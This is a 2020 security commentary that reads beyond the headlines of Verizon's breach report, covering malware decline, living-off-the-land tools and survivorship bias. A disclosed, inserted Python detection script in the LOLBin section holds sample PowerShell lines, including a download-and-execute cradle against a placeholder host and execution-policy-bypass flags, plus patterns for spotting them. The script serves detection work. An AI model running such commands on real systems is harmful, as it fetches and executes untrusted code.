Threat Intelligence

7/13/2020
10:00 AM
Chad Loeven
Commentary
Decoding the Verizon DBIR Report: An Insider's Look Beyond the Headlines

To truly understand cybersecurity trends, we must look beyond the headlines and ask more of the data. What you learn might surprise you.

For the past 13 years, Verizon's "Data Breach Investigations Report" (DBIR) has been the industry's definitive resource for documenting and benchmarking the global state of cybersecurity. As always, the Verizon DBIR team does an admirable job of sifting through an impressively large data set to tease out the underlying trends that are driving the market.

But as Miles Davis, the legendary jazz trumpeter, once famously said, "It's not the notes you play, it's the notes you don't play." In other words, it's the silence between the notes that enables the listener to interpret and appreciate the music's deeper meaning and context. When reading a broad industry survey such as the DBIR, it is likewise instructive to look beyond the bolded headlines and ask further questions of the data to best understand the meaning behind these trends.

Here's what I mean.

Headline #1: The Global Malware Threat Is Evaporating
According to DBIR: The Verizon DBIR team documents a precipitous decline of malware-related threats, from 50% in 2016 to just 6%, stating that "we think that other attack types such as hacking and social breaches benefit from the theft of credentials, which makes it no longer necessary to add malware in order to maintain persistence. So while we definitely cannot assert that malware has gone the way of the eight-track tape, it is a tool that sits idle in the attacker's toolbox in simpler attack scenarios."

Beyond the headline: Of course, it's heartening to read that malware threats are waning, and I agree with the interpretation that the broad availability of user credentials has, to a great extent, obviated the need for threat actors to employ malware to maintain persistence. Why bother climbing through a small basement window if you can just open the front door, right?

However, despite this downward trend, few threat researchers I know would take comfort in this pronouncement alone — nor would they presume that malware is a threat they no longer need worry about. Rather, the decline could be attributed to the fact that exploit kits, once the province of a sophisticated few threat actors, are now broadly available to a larger population via easy-to-use subscription services that don't require advanced malware to compromise the network. It also helps that the industry as a whole has collectively improved its ability to detect and block malware threats in general.

Another force behind the decline is that threat actors are relying less on malware as a blunt instrument to gain entry and rather leveraging legitimate system utilities and tools for malicious purposes. This is perhaps best exemplified with the rise of "living-off-the-land binaries" (LOLBins). Typically, threat actors will abuse legitimate apps like PowerShell with malicious scripts to avoid detection by conventional antivirus tools.
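As an added illustration that is not from the article or from VMRay, here is the defender-side counterpart of the LOLBin point above: a small triage pass over constructed PowerShell process-creation records that flags the launch patterns conventional antivirus tends not to catch on its own and decodes any -EncodedCommand argument for the analyst. The record shape, the indicator regexes, the two-hit threshold and the example.invalid host are all assumptions.

```python
import base64
import re

# Constructed process-creation records, loosely shaped like a Windows 4688 /
# Sysmon event 1 (process name plus command line). Illustrative, not captured.
SAMPLE_EVENTS = [
    {"id": 1, "cmdline": r"powershell.exe -NoProfile -File C:\Scripts\nightly-backup.ps1"},
    {"id": 2, "cmdline": "powershell.exe -nop -w hidden -ep bypass -enc QQBBAEEA"},
    {"id": 3, "cmdline": "powershell.exe -c \"IEX (New-Object Net.WebClient)"
                         ".DownloadString('http://example.invalid/a')\""},
]

# PowerShell accepts unambiguous prefixes of parameter names, so each pattern also
# covers the short forms. Assumed starting-point heuristics, not a vendor rule set.
ENC_RE = re.compile(r"(?i)\s-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})")
INDICATORS = [
    ("encoded_command", ENC_RE),
    ("execution_policy_bypass", re.compile(r"(?i)\s-e(?:p|x[a-z]*)\s+bypass")),
    ("hidden_window", re.compile(r"(?i)\s-w[a-z]*\s+hidden")),
    ("download_cradle", re.compile(
        r"(?i)DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b|Net\.WebClient")),
    ("invoke_expression", re.compile(r"(?i)\bIEX\b|Invoke-Expression")),
]

def match_indicators(cmdline):
    """Names of every indicator present in the command line, in INDICATORS order."""
    return [name for name, rx in INDICATORS if rx.search(cmdline)]

def decode_encoded_command(cmdline):
    """Plaintext of an -EncodedCommand argument (base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None

def triage(events, min_hits=2):
    """(id, indicators, decoded payload) for events with at least min_hits
    indicators; two hits keeps a lone '-w hidden' scheduled task off the queue."""
    findings = []
    for ev in events:
        hits = match_indicators(ev["cmdline"])
        if len(hits) >= min_hits:
            findings.append((ev["id"], hits, decode_encoded_command(ev["cmdline"])))
    return findings
```

The base64 in record 2 decodes to the harmless string "AAA"; in practice the decoded text is what you feed to the next stage of analysis, since the outer command line tells you little about intent.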

Headline #2: It's Still All About the Benjamins, but ...
According to DBIR: Financial rewards remain the primary motivator for threat actors. However, DBIR authors acknowledged a "secondary" motivating factor, for which the compromised infrastructure "is not the main target, but a means to an end as part of another attack."

Beyond the headline: What the authors call secondary is a convenient way to group a wide spectrum of disparate motivations under a single umbrella. However, it also hints at another underlying trend, which is that threat actors are being both more selective at deploying malware and increasingly using evasive malware strains to conduct longer-term intelligence-gathering operations.

With respect to droppers and Trojans, the authors note that while they find these particular threats decreasing over time, "their backdoor and remote-control capabilities are still a key functionality for more advanced attackers to operate and achieve their objective." We've seen ample evidence of this in our work at VMRay analyzing a variety of banking Trojans (for example, Trickbot and Ursnif). We have seen firsthand how they are increasingly being leveraged to conduct a wide range of secondary information reconnaissance — from querying the network for configuration settings, to recording what software and services are installed and running, to breaching HR and payroll systems — all of which attackers can leverage for future attacks.

This supports the case that more sophisticated attackers — be they nation-states or criminal organizations — are leveraging known malware strains and repurposing them for extended campaigns whose primary objective is to maintain persistence.

Headline #3: Reverse Survivorship Bias (aka, It's What We Aren't Seeing That Could Really Be Hurting Us)
According to DBIR: "Our incident corpus suffers from the opposite of survivorship bias. Breaches and incidents are records of when the victim didn't survive. … Malware being blocked by your protective controls is an example of survivorship bias where the potential victim didn't get the malware" … and that "it is important to acknowledge that the relative percentage of malware that we see present in breaches and incidents may not correspond to your experiences fighting, cleaning and quarantining malware throughout your own organization."

Beyond the headline: Perhaps the most well-known example of survivorship bias comes from statistician Abraham Wald, who during World War II took this bias into account when considering how to minimize bomber loss to enemy fire. He observed that it was the planes that never came home — rather than the ones that did despite being riddled with bullet holes, especially in their wings — that should inform the decision as to where bombers should be reinforced with additional armor (the fuselage area).

It's good to see the DBIR authors both acknowledge and highlight this particular issue, because even the most comprehensive datasets tell only part of the story. Blocked malware is the authors' own example of the potential victim never receiving the sample, but the open question remains how many malware threats never made it into the sample population not because they were blocked, but because they succeeded in evading detection. It stands to reason that the malware of 2019 is significantly better at hiding its tracks than the malware of 2014.

The Verizon DBIR has become a truly invaluable resource for threat researchers and security analysts who are continuously tasked with planning for every variety of "what-if" scenario. More than anything, though, the report is a showcase of cross-industry collaboration at its finest, with growing participation from an array of diverse security vendors, government agencies, and nonprofit organizations. Regardless of what the data says about the state of the current threat environment, this type of open cooperation among even the fiercest competitors represents our best hope in keeping our future secure.

(Note: VMRay is among the report's contributing organizations.)

Chad Loeven has been involved in enterprise security for over 20 years. Prior to VMRay he managed technology alliances at RSA, the security division of EMC. He came on board RSA via its acquisition of Silicium Security and Silicium's ECAT ETDR (Endpoint Threat Detection and ...